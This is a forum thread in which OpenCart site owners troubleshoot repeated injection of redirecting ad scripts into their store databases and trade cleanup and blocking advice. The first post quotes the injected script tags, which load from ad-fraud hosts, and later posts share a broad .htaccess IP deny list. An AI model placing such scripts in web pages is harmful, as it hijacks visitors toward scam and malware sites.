Post by shivers » Mon May 22, 2017 9:26 am

Opencart 2.1.0.1 (Romantic theme from ThemeForest)

I have a client with an Opencart site which seems to be getting hacked via SQL injection. Scripts are getting inserted into the product & category descriptions. The scripts hijack clicks on the product & category pages causing windows to popup directing to dodgy sites (spammy virus warnings etc.). Example scripts:

Code: Select all

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script>
Each time I roll back the site to a clean state (all files and database) a day or two will pass and the injected script is back. I've implemented all Opencart security recommendations from here: http://docs.opencart.com/administration/security/

The appear to be no file changes being made and the admin doesn't seem to be compromised. I'm not sure where the vulnerability lies.

Others seem to be facing similar problems:

viewtopic.php?f=179&t=182955
viewtopic.php?f=179&t=183438

Newbie

Posts

Joined
Mon May 22, 2017 8:47 am

Post by IP_CAM » Tue May 23, 2017 12:17 am

to me, it's not a surprise, actually, considering the massive amount of 'illegal' distributed OC Extensions,
that one or the other Extension possibly contains some Malware as well, because, who in the world
would buy extensions, and then re-distribute them for free, just to make others happy ?! :laugh:

And it's also no surprise, because the majority of OC Users likely has no Clue about anything, and they
only start to care about Security, if they get hit. In addition, the majority of OC-Users install Extensions,
and Themes, consisting of custom Scriptings and other Code, likely even changing the OC-Default Way
of doing it. :-\

But there is not a single day, without some BoozoBrains, trying to find ways, to get in, at least in my case,
and I am just glad, to use the seemengly most hackerproof OC-Version ever designed. But still, it does not
keep me from regularely re-checking again, comparable with making sure, to have all of my Doors and
Windows locked, whenever I leave Home... ::)
to just add my 2 cents to this.
Ernie
PS. part of today's (redirect) hacker-log, so far... :crazy:
Image
---
And this is my latest .htaccess IP_ Lockout content, to keep 'em rangewise out for good!

Code: Select all

<Files *>
order allow,deny
allow from all
deny from 5.77.34.
deny from 37.59.
deny from 37.128.
deny from 46.101.
deny from 46.161.
deny from 46.229.
deny from 47.90.
deny from 51.255.
deny from 63.243.
deny from 66.148.
deny from 69.10.
deny from 69.49.
deny from 77.244.
deny from 80.92.
deny from 80.190.
deny from 83.18.
deny from 87.118.
deny from 87.236.
deny from 86.123.
deny from 88.76.
deny from 88.86.
deny from 91.121.
deny from 91.142.
deny from 92.
deny from 93.104.
deny from 94.23.
deny from 94.177.
deny from 94.242.
deny from 97.74.
deny from 98.124.
deny from 103.27.
deny from 108.167.
deny from 113.10.
deny from 115.217.
deny from 119.28.
deny from 122.201.
deny from 125.
deny from 141.105.
deny from 143.202.
deny from 145.87.
deny from 148.251.
deny from 149.56.
deny from 149.202.
deny from 151.13.
deny from 158.222.
deny from 163.172.
deny from 164.132.
deny from 168.144.
deny from 174.37.
deny from 175.126.
deny from 178.137.
deny from 178.250.
deny from 180.76.
deny from 182.50.
deny from 184.172.
deny from 185.147.
deny from 188.213.
deny from 188.234.
deny from 198.1.
deny from 198.2.
deny from 198.12.
deny from 199.15.
deny from 200.9.
deny from 200.21.
deny from 200.75.
deny from 202.46.
deny from 203.124.
deny from 211.202.
deny from 212.109.
deny from 212.237.
deny from 213.251.
deny from 216.244.
deny from 217.28.
deny from 217.73.
deny from 217.182.
</Files>

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by sims » Tue May 23, 2017 7:09 pm

Had exactly the same attack, Opencart 1.5.5.1 , Simple great theme - no dodgy themes

As you Every single security process followed before

I run a hashcheck on the entire filesystem twice a day not a single was altered or upload

Crawlprotect did not prevent it

I can wholly recommend https://www.getastra.com/ they know about this issue

Maybe Opencart can help by investigating ?

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by rhysjuk » Wed May 24, 2017 5:03 am

This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message.
Have you checked to make sure your running the latest version of your theme?

Have you checked my earlier post regarding this SQL injection? You might want to try this viewtopic.php?t=115388

Don't worry about the index file in every directory, I didn't do this for my client - I didn't feel the need.
Last edited by rhysjuk on Wed May 24, 2017 5:23 am, edited 2 times in total.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by rhysjuk » Wed May 24, 2017 5:13 am

And this is my latest .htaccess IP_ Lockout content, to keep 'em rangewise out for good!

Code: Select all

<Files *>
order allow,deny
allow from all
deny from 5.77.34.
deny from 37.59.
deny from 37.128.
deny from 46.101.
deny from 46.161.
deny from 46.229.
deny from 47.90.
deny from 51.255.
deny from 63.243.
deny from 66.148.
deny from 69.10.
deny from 69.49.
deny from 77.244.
deny from 80.92.
deny from 80.190.
deny from 83.18.
deny from 87.118.
deny from 87.236.
deny from 86.123.
deny from 88.76.
deny from 88.86.
deny from 91.121.
deny from 91.142.
deny from 92.
deny from 93.104.
deny from 94.23.
deny from 94.177.
deny from 94.242.
deny from 97.74.
deny from 98.124.
deny from 103.27.
deny from 108.167.
deny from 113.10.
deny from 115.217.
deny from 119.28.
deny from 122.201.
deny from 125.
deny from 141.105.
deny from 143.202.
deny from 145.87.
deny from 148.251.
deny from 149.56.
deny from 149.202.
deny from 151.13.
deny from 158.222.
deny from 163.172.
deny from 164.132.
deny from 168.144.
deny from 174.37.
deny from 175.126.
deny from 178.137.
deny from 178.250.
deny from 180.76.
deny from 182.50.
deny from 184.172.
deny from 185.147.
deny from 188.213.
deny from 188.234.
deny from 198.1.
deny from 198.2.
deny from 198.12.
deny from 199.15.
deny from 200.9.
deny from 200.21.
deny from 200.75.
deny from 202.46.
deny from 203.124.
deny from 211.202.
deny from 212.109.
deny from 212.237.
deny from 213.251.
deny from 216.244.
deny from 217.28.
deny from 217.73.
deny from 217.182.
</Files>
It's not best practice to deny a range of IP's, but rather allow only the IP of the administrator to site files. Attackers often use proxy's to mask their IP, rendering the deny range useless.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by IP_CAM » Wed May 24, 2017 7:40 am

well, to me, it only matters, to keep those entire 'Groups' from further being able
to access my Sites, less traffic just makes my Logs easier to overlook ! :D
I do not recommend it either, it's just to show, how I usually handle such at present.

And to test i.E. the Secure Admin Access Security, I even need such Attempts,
to find out, if my Setup and Security is working in order! ;)

But under 'real' Terms, I would make use of my 'MotherHacker' .htaccess, doing a top
Job on my 'Public' Sites for many Years already. It's built to either 'deny', or then 'reroute',
all kinds of 'known' attempts, down to proxy-connections and bot's. It so far never let me down.
It took a good while, and good people, to get it done, and still takes work, once in a while ... ;)
Good Luck!
Ernie
---
PS: But I am also fully aware of, that great OC -REDIRECT-Extensions exist ! Just to mention it.

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by shivers » Wed May 24, 2017 9:31 am

rhysjuk wrote:
Wed May 24, 2017 5:03 am
This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message.
Have you checked to make sure your running the latest version of your theme?

Have you checked my earlier post regarding this SQL injection? You might want to try this viewtopic.php?t=115388

Don't worry about the index file in every directory, I didn't do this for my client - I didn't feel the need.
Thanks., I've sent a PM.

Yes latest theme version (and no dodgy extensions!). I did see your thread and followed that link thanks :) I've implemented most of those recommendations from that 2013 thread, but I believe some are referring to and earlier version of Opencart.

It's been a couple of days and there has been no reoccurrence of the injected scripts yet. Though I did have most of the implementations in place before… and they still got through.

Traffic is also running through Cloudflare (free plan). Their pro plan at $20/month comes with a WAF. I'm liking their service so far so I may try that out too, but I'm aware Cloudflare can be bypassed relatively easily.

Newbie

Posts

Joined
Mon May 22, 2017 8:47 am

Post by shivers » Wed May 24, 2017 9:42 am

sims wrote:
Tue May 23, 2017 7:09 pm
Had exactly the same attack, Opencart 1.5.5.1 , Simple great theme - no dodgy themes

As you Every single security process followed before

I run a hashcheck on the entire filesystem twice a day not a single was altered or upload

Crawlprotect did not prevent it

I can wholly recommend https://www.getastra.com/ they know about this issue

Maybe Opencart can help by investigating ?
Thanks I had not heard of Astra before I will look into it now, seems like a good service.

Newbie

Posts

Joined
Mon May 22, 2017 8:47 am

Post by ADD Creative » Thu May 25, 2017 12:38 am

sims wrote:
Tue May 23, 2017 7:09 pm
Had exactly the same attack, Opencart 1.5.5.1 , Simple great theme - no dodgy themes

As you Every single security process followed before

I run a hashcheck on the entire filesystem twice a day not a single was altered or upload

Crawlprotect did not prevent it

I can wholly recommend https://www.getastra.com/ they know about this issue

Maybe Opencart can help by investigating ?
What do Astra know about the issue. Could you share that?

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by rhysjuk » Thu May 25, 2017 1:26 am

shivers wrote:
Wed May 24, 2017 9:31 am
rhysjuk wrote:
Wed May 24, 2017 5:03 am
This used to happen to my client twice a day, exactly as you describe. I found a way to prevent this from happening which I'm happy to share via Private Message.
Have you checked to make sure your running the latest version of your theme?

Have you checked my earlier post regarding this SQL injection? You might want to try this viewtopic.php?t=115388

Don't worry about the index file in every directory, I didn't do this for my client - I didn't feel the need.
Thanks., I've sent a PM.

Yes latest theme version (and no dodgy extensions!). I did see your thread and followed that link thanks :) I've implemented most of those recommendations from that 2013 thread, but I believe some are referring to and earlier version of Opencart.

It's been a couple of days and there has been no reoccurrence of the injected scripts yet. Though I did have most of the implementations in place before… and they still got through.

Traffic is also running through Cloudflare (free plan). Their pro plan at $20/month comes with a WAF. I'm liking their service so far so I may try that out too, but I'm aware Cloudflare can be bypassed relatively easily.
I'm using the free version of cloudflare, love it. You can enforce HTTPS access for added security. Not used WAF but seen some good reviews online. I'll PM you some further details.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by jadedstudio » Thu Aug 03, 2017 6:34 am

I have the exact same issue as the OP.
Opencart 1.5.6.4 - running no modules except ones shipped with OC. Every day or 2 the DB has been hacked with javascript in the prod & cat descriptions.

Did anyone find where this vulnerability is or how to fix / prevent further?

Many thanks!

Newbie

Posts

Joined
Thu Feb 03, 2011 9:57 pm

Post by IP_CAM » Thu Aug 03, 2017 8:18 am

Well then, first find out, where/how the intruder came into your system.
For this, download the entire Software from the Server, including your
image Directories, because you have to check into those Directories
as well, to find out, if anything else, but real images, exist in those Subs.
---
On the Server, remove the entire content of your Shop Directory,
exept for the image/data/... Subdirectories , but clean out in full the
image/cache/ ..... Subdirectories also.

Or then, RENAME the existing Shop Directory, create a new one,
and further follow the advise below.

Then, check the Site ROOT section and it's Subdirectories, it may
be possibly, that an attacker found a hole there somewhere...
---
OC v.1.5.6.5_rc - download:
http://www.bigmax.ch/shop/index.php?rou ... tion_id=4

Then just upload the latest 1.5.6.5_rc Version, it's the same
Version as yours, but it had some important fixes made, on misses found
on OC v.1.5.6.4 before. You don't need to upload the 1.5.6.5 INSTALL
Section
anymore, BUT also upload the two old and already configured
config.php Files, one in shop ROOT and one in shop ADMIN Section ,
content-wise as downloaded before from the old Server Shop Software.

Your Shop should then technically work, as before, but some settings
may have to be admin-set again. And if you use a VqMod, get, unzip,
upload and install VqMod v.2.6.1 first:
https://github.com/vqmod/vqmod/tree/v2.6.1-opencart
and add your VqMod, after checking it too for possibly 'false' code!
---
This way, you at least can be sure, to have clean system again.
---
But then, the Database needs to be checked as well, since the
hack has possibly been placed there. But you should also COMPARE
the Content of a CLEAN 1.5.6.4 and your downloaded Shop Files,
to find out, if something FISHY has been added somewhere in some way.

And before you remove the old Software from your PC, check the Shop/DOWNLOAD
Subdirectory, possibly, someone added the hack by uploading something into
this Folder. Who knows ?! ::)

But it's not a known 1.5.6.4 vulnerability, rather a Door, left open by you
or your hoster, without beeing aware of possibly ...
Take it or leave it !
Good Luck! ;)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by MrPhil » Thu Aug 03, 2017 10:00 pm

A few days ago, @IP_CAM listed a log that included hack attempts (were all of those hack attempts?). I see a "directive" in the Query String which is quite large, and could be encoded scripting. The base OC doesn't appear to use "directive" from the Query String, so I'm wondering if perhaps the sites affected are using some dodgy extension with a "directive" that decodes into script? You might want to check your code for anyone looking at $_GET['directive'] (or something similar). If there does not appear to be a legitimate use for "directive", you can try either commenting out its use in the code, or blocking any URI containing it, and see if the attacks stop. And if you find you have an extension that either deliberately or accidentally allows hackers in via "directive", you should let the community know about it.

User avatar
Active Member

Posts

Joined
Wed May 10, 2017 11:52 pm

Post by ADD Creative » Fri Aug 04, 2017 1:02 am

jadedstudio wrote:
Thu Aug 03, 2017 6:34 am
I have the exact same issue as the OP.
Opencart 1.5.6.4 - running no modules except ones shipped with OC. Every day or 2 the DB has been hacked with javascript in the prod & cat descriptions.

Did anyone find where this vulnerability is or how to fix / prevent further?

Many thanks!
Some reported the issue was with the theme they were using. However not everyone was using that theme.
viewtopic.php?f=179&t=183812

If you have not done already, change all your passwords (hosting, FTP, database, OpenCart admin, etc.).
Check your files on the server for any added or modified files, by comparing against a fresh download of your version of OpenCart.
Look through your server logs for any suspicious activity around the time the injection took place.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by web-project » Tue Aug 15, 2017 11:08 pm

the easiest way to protect any software, get a professional hosting with csf firewall as part of this firewall you do have lfd which will detect any attempts of hacks and automatically ban any IP addresses

New member

Posts

Joined
Tue Sep 06, 2016 9:06 pm
Location - Stevenage, UK
Who is online

Users browsing this forum: No registered users and 17 guests